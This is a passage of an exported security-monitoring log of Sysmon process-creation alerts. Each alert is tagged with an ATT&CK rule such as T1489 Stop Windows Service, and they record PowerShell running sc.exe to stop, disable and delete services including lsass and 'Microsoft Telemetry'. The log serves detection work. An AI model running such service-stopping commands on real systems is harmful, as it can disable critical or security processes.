Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 
-NoProfile""}}}", +"May 29, 2020 @ 14:20:26.641",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.713 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010ea0a2e00} +ProcessId: 5660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.715399100Z"",""eventRecordID"":""3362"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.713\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010ea0a2e00}\r\nProcessId: 5660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control 
Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.713"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-0010ea0a2e00}"",""processId"":""5660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.625",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.701 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00100a0a2e00} +ProcessId: 7396 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Microsoft Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.703524600Z"",""eventRecordID"":""3361"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.701\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00100a0a2e00}\r\nProcessId: 7396\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.701"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00100a0a2e00}"",""processId"":""7396"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Microsoft Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.594",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.673 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001067082e00} +ProcessId: 5728 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.675638600Z"",""eventRecordID"":""3359"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.673\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001067082e00}\r\nProcessId: 5728\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:58.673"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001067082e00}"",""processId"":""5728"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.553",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.623 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00100f062e00} +ProcessId: 6348 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.627848300Z"",""eventRecordID"":""3356"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.623\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00100f062e00}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.623"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00100f062e00}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.504",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.581 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001064042e00} +ProcessId: 1664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: 
""C:\Windows\system32\sc.exe"" Delete SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.585919000Z"",""eventRecordID"":""3354"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.581\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001064042e00}\r\nProcessId: 1664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.581"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001064042e00}"",""processId"":""1664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.483",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.551 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00109d032e00} +ProcessId: 7712 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.553892300Z"",""eventRecordID"":""3353"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.551\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00109d032e00}\r\nProcessId: 7712\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.551"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00109d032e00}"",""processId"":""7712"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.438",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.498 
